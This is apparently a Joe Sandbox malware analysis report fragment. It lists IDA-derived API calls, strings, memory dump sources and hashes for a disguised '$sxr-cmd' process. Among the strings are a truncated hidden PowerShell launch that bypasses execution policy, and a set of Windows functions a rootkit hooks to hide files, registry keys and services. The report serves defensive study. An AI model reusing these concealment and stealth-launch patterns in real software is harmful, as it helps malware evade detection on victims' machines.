                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EF8FB
                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EF951
                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EF96B
                                                                                                            • wcschr.MSVCRT ref: 00007FF7137EFA8E
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137EFB14
                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EFB2D
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EFBEA
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137EF996
                                                                                                              • Part of subcall function 00007FF7137F0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF71380849D,?,?,?,00007FF71380F0C7), ref: 00007FF7137F0045
                                                                                                              • Part of subcall function 00007FF7137F0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71380F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF7137F0071
                                                                                                              • Part of subcall function 00007FF7137F0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F0092
                                                                                                              • Part of subcall function 00007FF7137F0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7137F00A7
                                                                                                              • Part of subcall function 00007FF7137F0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F0181
                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD401
                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD41B
                                                                                                            • longjmp.MSVCRT(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD435
                                                                                                            • longjmp.MSVCRT(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD480
                                                                                                            Strings
                                                                                                            • =,;, xrefs: 00007FF7137EF8C8
                                                                                                            • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO, xrefs: 00007FF7137EF90E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                            • String ID: =,;$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO
                                                                                                            • API String ID: 3964947564-2862168527
                                                                                                            • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                            • Instruction ID: 4a343bee82522c99e49f2328e67e4583e70c7ed1bca9ff88c454049a943d521e
                                                                                                            • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                            • Instruction Fuzzy Hash: 02028E21A09E02CAEBD4BB21A884578E6A5FF49B74FD14235D91E77694DF3EA41CC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$iswspacewcschr
                                                                                                            • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                            • API String ID: 840959033-3627297882
                                                                                                            • Opcode ID: 4657ea93f0aed74f3e4bb88c835e56408298cbf31f5b675b740e608a2e000999
                                                                                                            • Instruction ID: 282280849e571dcb5d3ed72e2623ded31a06d802f72c434b42fcb91420c7a3c2
                                                                                                            • Opcode Fuzzy Hash: 4657ea93f0aed74f3e4bb88c835e56408298cbf31f5b675b740e608a2e000999
                                                                                                            • Instruction Fuzzy Hash: 49D17C25A08E4386FBD0BB25A8852B9E6A8BF48B64FC44035D95E77395DE3DE41D8330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$EnvironmentVariable
                                                                                                            • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                            • API String ID: 198002717-267741548
                                                                                                            • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                            • Instruction ID: 8e97e3e1015b50505e1235df05fc216abeeaf261006c1c80d829bc98b0d074f0
                                                                                                            • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                            • Instruction Fuzzy Hash: 72513021A08E438AF790BB15A850279EB68FF4DBA0FC49035C95E63754EF6DE15C8770
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigitiswspacewcschr
                                                                                                            • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                            • API String ID: 1595556998-2755026540
                                                                                                            • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                            • Instruction ID: 7fa8e22b90e0502bcc158a3f848836e504972de81ff53bd7f50a6d642401471f
                                                                                                            • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                            • Instruction Fuzzy Hash: 33228EA5E0CE5681FBE07B15A480279E6A0BF097B1FC24232D99D72AD4DF3CA45DD630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                            • String ID: "$=,;
                                                                                                            • API String ID: 3545743878-4143597401
                                                                                                            • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                            • Instruction ID: e02a97cddb360842923323276f60a60ef058ce16de8d5a542898f159f2ebc558
                                                                                                            • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                            • Instruction Fuzzy Hash: 12C1A365A08E5289EBA57B159080379F6A1FF4DF64F849235CE5E32394EF3CA44DC230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: c7f81955cdff20067df238b0ddb5d7db7fc413d33bddc3bf9f4deecae0fc1fa8
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 8B418674122D6AF0FE04DB55E86EED82727A7E574DFC044A3B50A1617A9F7C824DC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentFormatMessageThread
                                                                                                            • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                            • API String ID: 2411632146-3173542853
                                                                                                            • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                            • Instruction ID: 092b5d46aefba5b7d98731528cb389fef54fced99227d423d8143bbc78d7a6c7
                                                                                                            • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                            • Instruction Fuzzy Hash: F8616C71A09E42C5EBA4EB51A4045B9A7E0FF44BA8FC80136DD4D2B754CF3EE5698730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                            • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction ID: 27b2178dc2995045d5769150ebd24a0060d458fe62719d9a81dcdb5bedbe776c
                                                                                                            • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction Fuzzy Hash: AD517B72205B58E6FB50CB62E458BD9B7A2F7D9B98F848124EB4A07B18DF38C0598740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile_open_osfhandle
                                                                                                            • String ID: con
                                                                                                            • API String ID: 2905481843-4257191772
                                                                                                            • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                            • Instruction ID: 2790992f76e87b3049637e50cd0f4b5e598ebaf39b789b868170f784eaf516f2
                                                                                                            • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                            • Instruction Fuzzy Hash: 2371B676608A818AE7A0AF14E440679FAA4FB8DB70F944234DA6E527D4DF3DD44DCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3829876242-3916222277
                                                                                                            • Opcode ID: f4952ccc81e9fcc75ba476bb44cabcc8e232d9e47a520838f14b2d4a8637c121
                                                                                                            • Instruction ID: ad255a79f1d9856a54b513f0468c1b248688e0909ca755c8f552af04d18616f2
                                                                                                            • Opcode Fuzzy Hash: f4952ccc81e9fcc75ba476bb44cabcc8e232d9e47a520838f14b2d4a8637c121
                                                                                                            • Instruction Fuzzy Hash: 99618036A08E428AEB94AB11941017EF6E4FFC9B64F858134DE1E27794DF3DE51D8720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                            • String ID: CSVFS$NTFS$REFS
                                                                                                            • API String ID: 3510147486-2605508654
                                                                                                            • Opcode ID: 0ee8c208da2ed77d277b3b8165e731868a5eb32fb0ce304e78f4d7262e372441
                                                                                                            • Instruction ID: 265e23a952d721fe9fff7d30e809ab0459430804060d3406e22a8fbb92750e1e
                                                                                                            • Opcode Fuzzy Hash: 0ee8c208da2ed77d277b3b8165e731868a5eb32fb0ce304e78f4d7262e372441
                                                                                                            • Instruction Fuzzy Hash: E3617E32708FC28AEBA19F21D8453E9B7A4FB49B94F844135CA4D5BB58DF79D208C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • longjmp.MSVCRT(?,00000000,00000000,00007FF7137E7279,?,?,?,?,?,00007FF7137EBFA9), ref: 00007FF713804485
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: longjmp
                                                                                                            • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                            • API String ID: 1832741078-366822981
                                                                                                            • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                            • Instruction ID: 23e41ca1f11c1c34f5171874e789c536a23edfa158ec564796a8d44a4717168d
                                                                                                            • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                            • Instruction Fuzzy Hash: 2DC1AF60E0CE8285E7E4BB5A55805B8E7E1AB4ABA4FD40136CD0D7B691CF3EA45D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heapwcschr$AllocateProcessmemset
                                                                                                            • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                            • API String ID: 2060774286-969133440
                                                                                                            • Opcode ID: 5a97b88e3d91fa77f019465bf968588e8ce7d313c2801e2b530795d61cd4474f
                                                                                                            • Instruction ID: e4c6cc33e5b9f1d1e9c4084e4eab51b4bfff61f345595b2c73dcb0cc1c3620b5
                                                                                                            • Opcode Fuzzy Hash: 5a97b88e3d91fa77f019465bf968588e8ce7d313c2801e2b530795d61cd4474f
                                                                                                            • Instruction Fuzzy Hash: FAB19121A0DE5281EAE0AB1590C4279EAA4FF4CBA4FD54235CA5E777A4DF3CE44D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
